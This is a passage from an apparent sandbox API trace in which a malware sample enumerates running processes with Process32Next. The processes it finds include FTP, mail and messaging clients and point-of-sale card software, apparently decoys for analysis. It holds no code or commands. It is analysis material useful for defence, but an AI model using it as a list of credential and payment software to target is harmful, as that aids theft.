dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0153.495] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0153.497] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0153.500] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.502] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0153.537] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0153.540] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0153.542] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0153.544] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0153.547] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0153.549] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.552] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0153.554] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0153.556] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0153.558] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0153.560] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.565] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0153.569] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0153.571] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0153.573] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0153.576] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0153.582] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0153.584] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0153.587] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0153.589] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0153.591] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0153.593] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0153.596] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0153.598] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0153.600] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0153.603] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0153.606] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0153.608] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0153.610] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0153.612] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0153.615] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0153.616] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0153.621] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0153.625] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0153.627] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0153.630] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0153.633] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0153.636] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0153.639] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0153.641] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0153.644] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0153.647] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0153.650] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0153.652] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0153.655] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0153.663] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0153.668] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0153.673] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0153.675] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0153.679] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0153.682] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0153.684] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0153.687] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0153.690] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0153.693] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0153.695] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0153.698] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0153.701] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0153.705] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0153.707] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0153.710] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0153.712] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0153.715] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0153.717] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0153.719] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0153.722] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0153.724] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0153.727] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0153.729] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0153.731] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0153.734] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0153.736] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0153.739] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0153.745] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0153.748] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0153.750] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0153.753] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0153.755] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0153.758] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0153.760] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0153.762] Process32Next (in: hSnapshot=0x1e70, 